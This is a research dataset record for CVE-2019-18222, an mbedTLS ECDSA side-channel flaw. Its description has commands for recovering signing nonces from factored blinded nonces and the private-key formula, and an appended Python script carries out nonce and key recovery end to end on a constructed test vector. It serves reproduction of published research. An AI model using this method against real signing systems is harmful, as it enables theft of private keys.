Dataset Open Access

CVE-2019-18222: research data and tooling

Alejandro Cabrera Aldaya; Billy Bob Brumley


DataCite XML Export

<?xml version='1.0' encoding='utf-8'?>
<resource xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://datacite.org/schema/kernel-4" xsi:schemaLocation="http://datacite.org/schema/kernel-4 http://schema.datacite.org/meta/kernel-4.1/metadata.xsd">
  <identifier identifierType="DOI">10.5281/zenodo.3605805</identifier>
  <creators>
    <creator>
      <creatorName>Alejandro Cabrera Aldaya</creatorName>
      <nameIdentifier nameIdentifierScheme="ORCID" schemeURI="http://orcid.org/">0000-0002-1544-6772</nameIdentifier>
      <affiliation>Tampere University</affiliation>
    </creator>
    <creator>
      <creatorName>Billy Bob Brumley</creatorName>
      <nameIdentifier nameIdentifierScheme="ORCID" schemeURI="http://orcid.org/">0000-0001-9160-0463</nameIdentifier>
      <affiliation>Tampere University</affiliation>
    </creator>
  </creators>
  <titles>
    <title>CVE-2019-18222: research data and tooling</title>
  </titles>
  <publisher>Zenodo</publisher>
  <publicationYear>2020</publicationYear>
  <subjects>
    <subject>side-channel analysis</subject>
    <subject>ECDSA</subject>
    <subject>binary GCD</subject>
    <subject>modular inversion</subject>
    <subject>Intel SGX</subject>
    <subject>mbedTLS</subject>
  </subjects>
  <dates>
    <date dateType="Issued">2020-01-13</date>
  </dates>
  <language>en</language>
  <resourceType resourceTypeGeneral="Dataset"/>
  <alternateIdentifiers>
    <alternateIdentifier alternateIdentifierType="url">https://zenodo.org/record/3605805</alternateIdentifier>
  </alternateIdentifiers>
  <relatedIdentifiers>
    <relatedIdentifier relatedIdentifierType="URL" relationType="IsCitedBy" resourceTypeGeneral="Preprint">https://eprint.iacr.org/2020/055</relatedIdentifier>
    <relatedIdentifier relatedIdentifierType="DOI" relationType="IsVersionOf">10.5281/zenodo.3605804</relatedIdentifier>
  </relatedIdentifiers>
  <rightsList>
    <rights rightsURI="https://opensource.org/licenses/MIT">MIT License</rights>
    <rights rightsURI="info:eu-repo/semantics/openAccess">Open Access</rights>
  </rightsList>
  <descriptions>
    <description descriptionType="Abstract">&lt;p&gt;This dataset and software tool are for reproducing the research results related to CVE-2019-18222.&lt;/p&gt;

&lt;p&gt;Description&lt;/p&gt;

&lt;ul&gt;
	&lt;li&gt;&lt;code&gt;enum&lt;/code&gt; contains the key enumeration tool.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;kt_candidates&lt;/code&gt; contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields:&lt;/li&gt;
&lt;/ul&gt;

&lt;ol&gt;
	&lt;li&gt;&lt;code&gt;kt_candidates&lt;/code&gt;: list of blinded nonce (&lt;code&gt;kt&lt;/code&gt;) candidates, as hex strings.&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
	&lt;li&gt;&lt;code&gt;sig_data&lt;/code&gt; contains the JSON for ECDSA signatures, indexed by trial number. JSON fields:&lt;/li&gt;
&lt;/ul&gt;

&lt;ol&gt;
	&lt;li&gt;&lt;code&gt;p&lt;/code&gt;: the prime the curve is defined over. (P-256 here.)&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;Gx&lt;/code&gt;, &lt;code&gt;Gy&lt;/code&gt;: Generator coordinates.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;d&lt;/code&gt;: Ground truth ECDSA long term key.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;Px&lt;/code&gt;, &lt;code&gt;Py&lt;/code&gt;: Public key coordinates.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;h&lt;/code&gt;: SHA-256 digest to sign, encoded to the finite field.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;k&lt;/code&gt;: Ground truth ECDSA nonce.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;r&lt;/code&gt;, &lt;code&gt;s&lt;/code&gt;: ECDSA signature.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Build&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;cd enum
make clean
make&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Run&lt;/p&gt;

&lt;p&gt;Start with &lt;code&gt;enum&lt;/code&gt; as the working directory.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;cd enum&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Pull out a &lt;code&gt;kt&lt;/code&gt; candidate; this example uses trial index 847.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json
[
  "0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0"
]&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Factor that candidate.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ time sage -c "print(ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0))"
[2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833]

real    0m5.837s
user    0m5.648s
sys 0m0.214s&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Now pull out the &lt;code&gt;r&lt;/code&gt; component of the ECDSA signature for that index, and convert it from hex to base 10.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ jq '.r' ../sig_data/sig_data_847.json
"0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
$ python -c "print(0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67)"
22111746808803128586382711090186612204136854333384650261207856620766542674791&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Now run the &lt;code&gt;enum&lt;/code&gt; tool to recover the nonce.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ ./enum 
Usage: ./enum &amp;lt;jobs_num&amp;gt; &amp;lt;jobs_id&amp;gt; &amp;lt;target_base_10&amp;gt; space delimited flat list of factors in base ten&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The &lt;code&gt;&amp;lt;jobs_num&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;jobs_id&amp;gt;&lt;/code&gt; arguments split the search across parallel workers; read the source code for the details. For a single-core run, pass them as &lt;code&gt;1 0&lt;/code&gt;.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 2831354697794195
32841 572987990320782777757565685333349772719941819448953457732874126833
INFO:target:30E2CE20A8140177A31A66763D85F431ACC9790DD050FFC22ED5D454CDFBBB67
INFO:found:31A52C4960857E6D2F7AD82BAC7D55CE6CC9AD13B959F069002B6A949EA6A048
INFO:tests:7879&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;where &lt;code&gt;221..791&lt;/code&gt; is the base-10 &lt;code&gt;r&lt;/code&gt; component of the ECDSA signature, and &lt;code&gt;2 2 .. 572..833&lt;/code&gt; is the full list of blinded nonce factors. In the output:&lt;/p&gt;

&lt;ul&gt;
	&lt;li&gt;&lt;code&gt;INFO:target:&amp;lt;hex&amp;gt;&lt;/code&gt; is the hex form of the base-10 target input (the ECDSA &lt;code&gt;r&lt;/code&gt; component).&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;INFO:found:&amp;lt;hex&amp;gt;&lt;/code&gt; is the hex form of the recovered ECDSA nonce.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;INFO:tests:&amp;lt;num&amp;gt;&lt;/code&gt; is the number of tested nonce candidates (scalar multiplications).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The recovered value matches the ground-truth nonce for this trial; with &lt;code&gt;k&lt;/code&gt; known, the long-term private key follows directly from the ECDSA signing equation as &lt;code&gt;d = (s*k - h) / r mod n&lt;/code&gt;:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ jq '.k' ../sig_data/sig_data_847.json
"0x31a52c4960857e6d2f7ad82bac7d55ce6cc9ad13b959f069002b6a949ea6a048"&lt;/code&gt;&lt;/pre&gt;</description>
  </descriptions>
  <fundingReferences>
    <fundingReference>
      <funderName>European Commission</funderName>
      <funderIdentifier funderIdentifierType="Crossref Funder ID">10.13039/501100000780</funderIdentifier>
      <awardNumber awardURI="info:eu-repo/grantAgreement/EC/H2020/804476/">804476</awardNumber>
      <awardTitle>Side-Channel Aware Engineering</awardTitle>
    </fundingReference>
  </fundingReferences>
</resource>
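The Run section of the description above walks one trial through by hand: factor the blinded nonce kt with Sage's ECM, hand the factor list and the base-10 r to enum, and compare the found nonce with the ground truth. The script below is an added worked example of that pipeline, written for this page; it is not the dataset's enum tool and not mbedTLS code. It implements P-256 arithmetic from scratch, signs with mbedTLS-style blinding (kt = k*t formed over the integers, which is why k divides kt exactly), enumerates divisors of kt from a flat factor list in the same shape ecm.factor() prints, and then recovers d. Two things are assumptions of mine rather than facts from the page: the pruning rule (both k and kt/k must be valid scalars below n), which is a sensible search but not necessarily what enum does, and the test vector (d, h, and a nonce and blinding factor built from Mersenne primes so the factorisation is known without running ECM), which is constructed and not taken from the dataset. Factoring a real 507-bit kt is left to ECM, as on the page; this script only consumes the factor list.

```python
"""Added example (not the dataset's enum tool, not mbedTLS): recover an ECDSA
nonce k from the factorisation of the blinded nonce kt = k*t, then the
long-term key d.  Pure Python 3.8+, no dependencies, NIST P-256 only."""
import math
from collections import Counter

# NIST P-256 domain parameters (a = -3).
P  = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A  = P - 3
B  = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
N  = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G  = (GX, GY)


def ec_add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:          # p1 == -p2
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P   # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication (attacker side, not constant time)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def ecdsa_sign_blinded(d, h, k, t):
    """mbedTLS-style blinded signing: s = t*(h + r*d) * inv(k*t) mod n.
    k*t is an integer product (no reduction mod n) before the inversion,
    so the true nonce k is an exact divisor of kt."""
    r = ec_mul(k, G)[0] % N
    kt = k * t
    s = t * (h + r * d) * pow(kt, -1, N) % N
    return r, s, kt


def ecdsa_verify(q, h, r, s):
    """Textbook ECDSA verification against public key q."""
    w = pow(s, -1, N)
    x = ec_add(ec_mul(h * w % N, G), ec_mul(r * w % N, q))
    return x is not None and x[0] % N == r


def divisors(factors):
    """All divisors of prod(factors), from a flat prime list with multiplicity
    (the shape Sage's ecm.factor() prints), ascending."""
    divs = [1]
    for prime, e in Counter(factors).items():
        divs = [d * prime ** i for d in divs for i in range(e + 1)]
    return sorted(divs)


def recover_nonce(r, factors):
    """Test divisors of kt as nonce candidates until x([k]G) mod n == r.
    Returns (k, number_of_scalar_multiplications).  Pruning is an assumption
    of this example: both k and t = kt/k must be scalars in [1, n-1]."""
    kt = math.prod(factors)
    tests = 0
    for cand in divisors(factors):
        if cand >= N:                   # ascending, nothing larger can be k
            break
        if kt // cand >= N:             # then t = kt/k would not be a valid scalar
            continue
        tests += 1
        pt = ec_mul(cand, G)
        if pt is not None and pt[0] % N == r:
            return cand, tests
    return None, tests


def recover_private_key(r, s, h, k):
    """Standard nonce-to-key step: d = (s*k - h) / r mod n."""
    return (s * k - h) * pow(r, -1, N) % N


# Constructed test vector (not from the dataset): nonce and blinding factor are
# products of Mersenne primes, so kt's factor list is known without ECM.
def mersenne(e):
    return (1 << e) - 1

K = mersenne(107) * mersenne(89) * mersenne(31) * mersenne(19)   # ~246-bit nonce
T = mersenne(127) * mersenne(61) * mersenne(17) * mersenne(13)   # ~218-bit blinding
FACTORS = sorted(mersenne(e) for e in (13, 17, 19, 31, 61, 89, 107, 127))
D = 0x3141592653589793238462643383279502884197169399375105820974944592  # private key
H = 0x2718281828459045235360287471352662497757247093699959574966967627  # digest as int


def demo():
    """Sign with the constructed k, t; then run the attack on (r, s, factors)."""
    q = ec_mul(D, G)
    r, s, kt = ecdsa_sign_blinded(D, H, K, T)
    assert math.prod(FACTORS) == kt
    k, tests = recover_nonce(r, FACTORS)
    d = recover_private_key(r, s, H, k)
    return {"r": r, "s": s, "k": k, "d": d, "tests": tests,
            "valid": ecdsa_verify(q, H, r, s)}


if __name__ == "__main__":
    out = demo()
    print("INFO:target:%X" % out["r"])
    print("INFO:found:%X" % out["k"])
    print("INFO:tests:%d key_recovered:%s" % (out["tests"], out["d"] == D))
```

To run it on a dataset trial instead of the constructed vector, pass the base-10 r from sig_data and the factor list printed by ecm.factor() to recover_nonce, then s and h from the same JSON to recover_private_key; the output lines mirror enum's target/found/tests format so the two can be compared side by side.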